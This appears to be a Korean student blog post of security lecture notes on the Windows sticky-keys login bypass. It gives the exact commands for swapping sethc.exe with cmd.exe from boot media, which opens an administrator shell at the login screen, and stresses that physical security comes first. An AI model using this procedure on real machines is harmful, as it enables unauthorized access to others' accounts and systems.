728x90
요약 물리적 보안이 제 1순위다.
유명한 윈도우 계정 해킹방법이 있었다.
shift 다섯 번 누르면 고정키를 설정할 것인지 물어보는 프로그램이 나오는데
C:\Windows\System32 의 sethc.exe가 바로 그 프로그램이다.
이 프로그램은 로그인 창에서도 열리는데 그 아이디어에 착안하여 shift 다섯 번을 누르면 cmd창이 나오게 할 수 있다.
윈도우 부팅 디스크로 관리자 권한으로 실행할 수 있는 cmd창을 그냥 열 수 가 있는데 여기서
sethc.exe를 cmd.exe로 바꿔치기하면 계정 로그인창에서 shift키를 다섯 번 눌러 cmd창을 열 수 있다.
여기서 핵심은 로그인 창에서 폴더 내부에 있는 프로그램을 열 수 있다는 것 같다. (파고 들 수 있는 취약점)
cd windows\system32
// 디렉토리 이동
copy sethc.exe sethc2.exe
copy cmd.exe cmd2.exe
// 만약을 대비한 백업
del sethc.exe
rename cmd2.exe sethc.exe
//CMD 프로그램으로 교체
쓰인 명령어
cd : 디렉터리 이동 (change directory)
copy A B : A로 B를 복사
del A : A 지우기 (delete)
rename A B : A의 이름을 B로 바꾸기
728x90
'보안 > 강의정리' 카테고리의 다른 글
| 라우터 Static연결실습, 디폴트 라우트(Default Route) (0) | 2021.05.24 |
|---|---|
| IP주소, Packet Tracer, DNS 서버, 게이트웨이 (0) | 2021.05.20 |
| 네트워크, 데이터의 기본용어 정리, CSMA/CD (0) | 2021.05.18 |
| 2021-05-17 정보보안 요소, hash 함수 (0) | 2021.05.17 |
| 2021-05-14 권한, 포맷, 파티션 (0) | 2021.05.14 |
